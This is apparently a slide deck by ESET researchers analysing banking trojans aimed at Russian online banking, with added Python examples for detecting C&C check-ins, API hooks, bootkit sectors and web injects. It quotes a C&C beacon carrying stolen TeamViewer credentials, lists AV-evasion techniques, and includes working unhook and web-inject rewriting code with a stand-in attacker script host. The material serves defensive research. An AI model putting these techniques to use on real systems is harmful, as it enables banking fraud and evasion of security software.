1. Modern malware techniques for attacking RBS systems in Russia
    Aleksandr Matrosov, Eugene Rodionov
2. Who we are?
    Malware researchers at ESET:
    - complex threats analysis
    - development of cleaning tools
    - tracking new malware techniques
    - investigation of cybercrime groups
    http://www.joineset.com/

3. Agenda
    - Cybercrime trends in RBS (remote banking systems)
    - Most prevalent threats and incidents:
      - Win32/Shiz
      - Win32/Hodprot
      - Win32/Sheldor
      - Win32/RDPdoor
      - Win32/Carberp
    - Carberp cybercrime group revenue

4. Overview
    2010/11: years of attacks on Russian banks
    - the number of incidents has more than doubled compared to 2010*
    - over 92%* of incidents involve banking trojans
    - malware tailored to Russian banks and payment systems
    However! It can be (and is) used in other countries as well.
    * research report "The Russian cybercrime market in 2010: status and trends",
      http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf

5. Interesting facts about Russian bank fraud
    These guys are still free!

6. Evolution of RBS trojans
    RBS Trojans 2009-2010:
    - Win32/Shiz (2009)
    - Win32/Carberp
    - Win32/Hodprot
    - Win32/Sheldor
    - Win32/RDPdoor
    RBS Trojans 2011:
    - multiple updates
    - growing number of incidents
    - ...
    - Win32/Carberp with bootkit
7. Cybercrime landscape (2010)

8. Cybercrime landscape (2011)

9. Cybercrime landscape (2011)
10. Win32/Spy.Shiz

11. Win32/Spy.Shiz detection statistics by month
    Cloud data from Live Grid, August 2009 – November 2011

12. Win32/Spy.Shiz detection statistics by country
    Cloud data from Live Grid

13. Win32/Spy.Shiz: stealing money
14. Win32/Hodprot

15. Win32/Hodprot detection statistics by month
    Cloud data from Live Grid, July 2010 – November 2011

16. Win32/Hodprot detection statistics by country
    Cloud data from Live Grid

17. Win32/Hodprot: antiforensics
    Diagram of the components the bot keeps: main module, original sfcfiles.dll,
    kernel-driver image, loader code, C&C URLs

18. Win32/Hodprot: injecting payload
    Diagram elements:
    - winlogon address space (user mode): setupapi.dll, sfcfiles.dll
    - system registry: the payload is assembled from it and updated in it
    - browser address space: the assembled payload is injected here
    - kernel mode: driver sfc.sys is installed and loaded; it also assembles
      and injects the payload

19. Win32/Hodprot: C&C protocol
    Win32/Hodprot -> C&C server: send request (bot ID, integer)
    C&C server: handle request
    C&C server -> Win32/Hodprot: reply with updated modules and image to execute
    Win32/Hodprot: update the bot's modules, run downloaded executable
    Win32/Hodprot -> C&C server: send status information
20. Win32/Sheldor & Win32/RDPdoor

21. Win32/Sheldor and TeamViewer in action
    1. Request cloud ID (infected computer -> TeamViewer cloud)
    2. Set cloud ID (TeamViewer cloud -> infected computer)
    3. Send ID to C&C:
       GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1
    4. Malicious connection through the TeamViewer cloud to the infected computer
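The check-in on slide 21 is a plain HTTP GET that hands the victim's TeamViewer ID and password to the C&C, so it is visible on any web proxy that logs full URLs. The following is an added example (not from the talk or ESET's tooling) that scans constructed proxy log lines for that URL shape; the log format, the client and C&C addresses and the second TeamViewer ID are made up, only the parameter names id, pwd and stat and the first ID come from the slide.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines (not from the talk): "timestamp client method url".
# 192.0.2.10 and 198.51.100.7 are documentation addresses standing in for C&C hosts.
SAMPLE_LOG = """\
2011-11-02T10:14:03 10.0.0.21 GET http://192.0.2.10/getinfo.php?id=414%20034%20883&pwd=6655&stat=1
2011-11-02T10:14:05 10.0.0.21 GET http://www.teamviewer.com/en/index.aspx
2011-11-02T10:15:11 10.0.0.33 GET http://198.51.100.7/getinfo.php?id=512%20771%20004&pwd=1234&stat=1
2011-11-02T10:16:00 10.0.0.45 POST http://intranet.example.test/login.php?id=17
"""

# TeamViewer IDs are displayed as three groups of three digits; the bot URL-encodes the spaces.
TV_ID_RE = re.compile(r"^\d{3} ?\d{3} ?\d{3}$")


def parse_sheldor_beacon(url):
    """Return (teamviewer_id, password, stat) if the URL matches the slide's
    /getinfo.php?id=...&pwd=...&stat=... check-in shape, otherwise None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/getinfo.php"):
        return None
    q = parse_qs(parts.query)          # parse_qs already decodes %20 to a space
    if not all(k in q for k in ("id", "pwd", "stat")):
        return None
    tv_id = q["id"][0]
    if not TV_ID_RE.match(tv_id):
        return None
    return tv_id.replace(" ", ""), q["pwd"][0], q["stat"][0]


def find_beacons(log_text):
    """Scan log lines and return one record per Sheldor-style check-in."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _method, url = fields[:4]
        beacon = parse_sheldor_beacon(url)
        if beacon is None:
            continue
        tv_id, pwd, stat = beacon
        hits.append({"time": ts, "client": client, "c2": urlsplit(url).hostname,
                     "tv_id": tv_id, "pwd": pwd, "stat": stat})
    return hits


if __name__ == "__main__":
    for h in find_beacons(SAMPLE_LOG):
        print(f"{h['time']} {h['client']} -> {h['c2']}: TeamViewer ID {h['tv_id']} pwd {h['pwd']}")
```

The match is deliberately narrow (path, three parameters, nine-digit ID) so that ordinary sites with an id parameter do not fire; the useful pivot is that a TeamViewer ID and password should only ever travel to TeamViewer's own infrastructure, so any other destination for that pair is worth an alert regardless of the path name.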
22. Under the hood: DLL hooking
    TeamViewer.exe -> TV.dll (proxy DLL) -> TS.dll (original TS.dll)

23. Malicious DLL call graph

24. Malicious DLL decompilation
    Annotated: functions for calling from the original TS.dll; load original TS.dll;
    hook functions; C&C URL

25. Sheldor C&C panel

26. Win32/RDPdoor installation (infected computer <-> C&C)
    1. run dropper and send system information
    2. authentication on C&C and provide Thinsoft BeTwin for installation
    3. send status information

27. Stealing authentication data
    1. Install GINA extension DLL
    2. Display fake logon screen
    3. Capture user name & password
    4. Send to C&C
28. Win32/Carberp

29. Win32/Carberp detections over time in Russia
    Cloud data from Live Grid, January 2010 – November 2011

30. Win32/Carberp detection statistics by country
    Cloud data from Live Grid

31. Self-protecting
    Feature                            Functionality
    Bypassing AV emulators             many calls of rare WinAPI functions
    Code injection method              ZwQueueApcThread(), ZwResumeThread()
    Unhooking method                   checking the first bytes of the API function body and deleting hooks
    Command and string encryption      custom encryption algorithm
    Bot authentication on C&C          file with authentication data stored on the infected PC
    Network communication encryption   base64(RC2(data))
    API function call obfuscation      custom hash algorithm
    Detection of AV hooks              comparison of the first original bytes
    Bypassing static AV signatures     appending random junk bytes to dropped files
    Hiding in the system               hooking system functions; bootkit infector (September 2011)
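Two rows of the table (unhooking and detection of AV hooks) describe one check: compare the first bytes of an API function as mapped in the process with the original bytes, and if they differ, treat the function as hooked and write the original bytes back. The following added example (not Carberp's code) classifies constructed function prologues by the common user-mode hook shapes and produces the bytes an unhooker would restore; the function names, addresses and hook targets are made up, and the x86 prologue constant is an assumption standing in for bytes read from the DLL on disk.

```python
import struct

# The "hot-patchable" x86 prologue most Windows API exports start with:
# mov edi,edi ; push ebp ; mov ebp,esp. Real tooling reads these bytes from
# the DLL on disk instead of assuming a constant (assumption for the example).
CLEAN_PROLOGUE = bytes.fromhex("8BFF558BEC")


def classify_prologue(func_va, in_memory, on_disk=CLEAN_PROLOGUE):
    """Compare a function's first bytes in memory with the on-disk copy.
    Returns (verdict, hook_target); hook_target is None unless a jump was decoded."""
    if in_memory[:len(on_disk)] == on_disk:
        return "clean", None
    b = in_memory
    if len(b) >= 5 and b[0] == 0xE9:                       # jmp rel32
        rel = struct.unpack_from("<i", b, 1)[0]
        return "inline-jmp", (func_va + 5 + rel) & 0xFFFFFFFF
    if len(b) >= 6 and b[:2] == b"\xff\x25":               # jmp dword ptr [abs32]
        return "inline-jmp-indirect", struct.unpack_from("<I", b, 2)[0]
    if len(b) >= 6 and b[0] == 0x68 and b[5] == 0xC3:      # push imm32 ; ret
        return "push-ret", struct.unpack_from("<I", b, 1)[0]
    return "modified", None


def unhook(in_memory, on_disk=CLEAN_PROLOGUE):
    """Bytes the bot would write back over the function start to delete the hook."""
    return on_disk + in_memory[len(on_disk):]


def make_jmp_hook(func_va, target):
    """Build the 5-byte E9 trampoline a hooking engine plants (constructed sample)."""
    return b"\xe9" + struct.pack("<i", target - (func_va + 5)) + b"\x90\x90\x90"


# Constructed samples: (virtual address, first 8 bytes as seen in the process).
# Addresses are arbitrary and do not correspond to a real module layout.
SAMPLES = {
    "kernel32!CreateFileW": (0x7C801A28, CLEAN_PROLOGUE + b"\x90\x90\x90"),
    "ws2_32!send": (0x71AB4C27, make_jmp_hook(0x71AB4C27, 0x10001000)),
    "wininet!HttpSendRequestA": (0x3D95E7F4,
                                 b"\x68" + struct.pack("<I", 0x10002000) + b"\xc3\x90\x90"),
}


def scan(samples):
    """Return {function_name: (verdict, hook_target)} for every entry."""
    return {name: classify_prologue(va, code) for name, (va, code) in samples.items()}


if __name__ == "__main__":
    for name, (verdict, target) in scan(SAMPLES).items():
        where = f" -> 0x{target:08X}" if target is not None else ""
        print(f"{name:28s} {verdict}{where}")
```

The same comparison serves both sides: an AV or EDR agent runs it to find hooks planted by malware, and the bot runs it to find the agent's hooks and strip them before calling the API, which is why the table lists it under both headings. Anything the scan reports as "modified" rather than a recognised jump shape deserves a manual look, since it is neither the clean prologue nor a standard trampoline.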
32. Carberp going deeper since September 2011

33. Carberp going deeper since September 2011
    Boot sequence:
    1. Load MBR (real mode)
    2. Load VBR (real mode)
    3. Load bootstrap code (real mode/protected mode) <- target of Rovnix & Carberp
    4. Load bootmgr (real mode/protected mode)
    5. Load winload.exe or winresume.exe (real mode/protected mode)
    6. Load kernel and boot-start drivers

34. Carberp: infected partition layout
    - Carberp overwrites the bootstrap code of the active partition
    - The malicious driver is written either:
      - before the active partition, in case there is enough space
      - at the end of the hard drive, otherwise
    Before infecting: MBR | VBR | NTFS bootstrap code (15 sectors) | file system data
    After infecting:  MBR | VBR | malicious bootstrap code | file system data,
                      plus compressed data / the malicious unsigned driver in one of
                      the two locations above
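Slide 34 gives a forensic starting point: the infected volume's bootstrap code is replaced, and the driver lives outside any file system, either in the unpartitioned space before the active partition or at the end of the drive. The following added example (not ESET's tooling) builds a constructed MBR disk image with one active NTFS partition, parses the partition table, reports non-zero sectors in those two regions and hashes the VBR-plus-bootstrap region for comparison with a known-good copy; the layout, sizes and driver blob are made up for the demonstration.

```python
import hashlib
import struct

SECTOR = 512
NTFS_BOOT_SECTORS = 16   # VBR plus the 15 sectors of NTFS bootstrap code named on the slide


def parse_mbr(mbr):
    """Return the non-empty partition entries of a classic MBR."""
    if len(mbr) < SECTOR or mbr[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA MBR signature")
    entries = []
    for i in range(4):
        off = 446 + 16 * i
        status, ptype = mbr[off], mbr[off + 4]
        start, count = struct.unpack_from("<II", mbr, off + 8)
        if ptype != 0:
            entries.append({"index": i, "active": status == 0x80,
                            "type": ptype, "start": start, "count": count})
    return entries


def nonzero_sectors(img, start, count):
    """LBAs in [start, start+count) that contain anything other than zero bytes."""
    return [lba for lba in range(start, start + count)
            if any(img[lba * SECTOR:(lba + 1) * SECTOR])]


def triage(img):
    """Locate the active partition and inspect the two places the slide names as
    driver hiding spots: the gap before the first partition and the tail of the disk."""
    total = len(img) // SECTOR
    parts = parse_mbr(img[:SECTOR])
    active = next(p for p in parts if p["active"])
    vbr_off = active["start"] * SECTOR
    boot_region = img[vbr_off:vbr_off + NTFS_BOOT_SECTORS * SECTOR]
    first_start = min(p["start"] for p in parts)
    last_end = max(p["start"] + p["count"] for p in parts)
    return {
        "active": active,
        "ntfs_vbr": img[vbr_off + 3:vbr_off + 11] == b"NTFS    ",
        # compare with the hash of a known-good boot region from the same OS build
        "boot_region_sha256": hashlib.sha256(boot_region).hexdigest(),
        "gap_before_first": nonzero_sectors(img, 1, first_start - 1),
        "tail_after_last": nonzero_sectors(img, last_end, total - last_end),
    }


def build_image(total_sectors, part_start, part_count, blob=b"", place="before"):
    """Constructed disk image: one active NTFS partition, with an optional blob written
    right after the MBR (place="before") or right after the partition (place="end")."""
    img = bytearray(total_sectors * SECTOR)
    entry = bytes([0x80, 0, 0, 0, 0x07, 0, 0, 0]) + struct.pack("<II", part_start, part_count)
    img[446:462] = entry
    img[510:512] = b"\x55\xaa"
    vbr = part_start * SECTOR
    img[vbr:vbr + 11] = b"\xeb\x52\x90NTFS    "     # jmp short + nop + NTFS OEM ID
    img[vbr + 510:vbr + 512] = b"\x55\xaa"
    if blob:
        off = SECTOR if place == "before" else (part_start + part_count) * SECTOR
        img[off:off + len(blob)] = blob
    return bytes(img)


# Three sectors of non-zero filler standing in for the stored driver (constructed).
DRIVER_BLOB = (b"MZ" + bytes(range(2, 256))) * 6


if __name__ == "__main__":
    # 1 MiB-aligned partition: plenty of room before it, so the blob goes there
    print(triage(build_image(4096, 2048, 2000, DRIVER_BLOB, "before")))
    # legacy 63-sector offset: too little room in front, so the blob goes to the tail
    print(triage(build_image(4096, 63, 4000, DRIVER_BLOB, "end")))
```

On a real image the gap and tail lists are noisy (boot managers, alignment padding, old data), so the list is a starting point for carving, not a verdict; the hash of the first 16 sectors of the volume, compared against a clean install of the same Windows build, is the check that answers the slide's main point directly.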
35. Interesting strings and investigation

36. Win32/Carberp: money stealing methods
    Stealing technique                             Functionality
    Web-injects/autoloads (IE, FF, Chrome, Opera)  inserting the specified JS code into the HTML returned by the online banking site
    Backconnect backdoor (RDP/VNC)                 loading on request a special binary module (RDPdoor, custom VNC client)
    Keylogger (based on WinAPI)                    recording keyboard events into a logfile
    ScreenSpy (based on WinAPI)                    saving screenshots into a logfile
    Grabbers (form, FTP, pass)                     loading on request a special binary module
    Custom plugins for RBS                         binary modules for specified RBS (sber.plug)
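The first row of the table is the man-in-the-browser web inject: the bot edits the HTML the bank's server returned before the browser renders it, so the user sees extra fields or scripts on a page whose URL and certificate are genuine. The following added example (not Carberp's injector) applies a constructed inject rule to a constructed login page and then lists the script sources that are foreign to the bank's host; the ZeuS-style set_url/data_before/data_inject/data_after rule layout, the bank host and the 203.0.113.5 address are assumptions for illustration, not something the talk states.

```python
import fnmatch
import re
from urllib.parse import urlsplit

# Constructed rule in the ZeuS-style set_url/data_before/data_inject/data_after layout
# (an assumption; the talk only says the bot inserts specified JS into the bank's HTML).
INJECTS = [{
    "set_url": "https://online.example-bank.test/login*",
    "data_before": '<input type="password" name="password">',
    "data_inject": ('\n<label>One-time code</label><input name="otp">'
                    '\n<script src="https://203.0.113.5/inj.js"></script>'
                    '\n<button>Sign in</button>\n'),
    "data_after": "</form>",
}]

# Constructed page as the bank's server sends it (no third-party scripts).
SERVED_HTML = """<html><body>
<script src="https://online.example-bank.test/static/app.js"></script>
<form action="/login.do" method="post">
<input type="text" name="login">
<input type="password" name="password">
<button>Sign in</button>
</form>
</body></html>
"""


def apply_webinjects(url, html, injects):
    """Rewrite html the way a man-in-the-browser does: for every rule whose set_url
    matches, replace the text between data_before and data_after with data_inject."""
    out = html
    for rule in injects:
        if not fnmatch.fnmatchcase(url, rule["set_url"]):
            continue
        i = out.find(rule["data_before"])
        if i < 0:
            continue
        i += len(rule["data_before"])
        j = out.find(rule["data_after"], i) if rule["data_after"] else i
        if j < 0:
            continue
        out = out[:i] + rule["data_inject"] + out[j:]
    return out


SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc="([^"]+)"', re.I)


def foreign_scripts(html, bank_host):
    """Script sources not served from bank_host: what an in-page integrity check
    or a CSP violation report would flag once the inject has been applied."""
    return [src for src in SCRIPT_SRC_RE.findall(html)
            if urlsplit(src).hostname != bank_host]


if __name__ == "__main__":
    modified = apply_webinjects("https://online.example-bank.test/login.do", SERVED_HTML, INJECTS)
    print(modified)
    print("foreign scripts:", foreign_scripts(modified, "online.example-bank.test"))
```

Because the rewrite happens inside the browser process after TLS is terminated, the bank's server never sees the altered page; a Content-Security-Policy header would block the foreign script only if the bot does not also rewrite response headers, which a bot hooking the browser's network functions is in a position to do. Server-side signals such as unexpected form fields in the POST (here an otp field the bank never rendered) remain visible.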
37. Win32/Carberp botnet control panel

38. C&C with stolen data

39. Cab-files with stolen data

40. Stolen data: BS-Client IB system

41. Stolen data: CyberPlat payment system

42. Stolen data: iBank IB system

43. Stolen data: SberBank IB

44. Stolen data: UkrSibBank IB

45. References
    - "Cybercrime in Russia: Trends and issues", http://go.eset.com/us/resources/white-papers/CARO_2011.pdf
    - "Evolution of Win32/Carberp: going deeper", http://blog.eset.com/2011/11/21/evolution-of-win32carberp-going-deeper
    - "Hodprot: Hot to Bot", http://go.eset.com/us/resources/white-papers/Hodprot-Report.pdf
    - Follow the ESET Threat Blog: http://blog.eset.com

46. Questions

47. Thank you for your attention ;)
    Aleksandr Matrosov, matrosov@eset.sk, @matrosov
    Eugene Rodionov, rodionov@eset.sk, @vxradius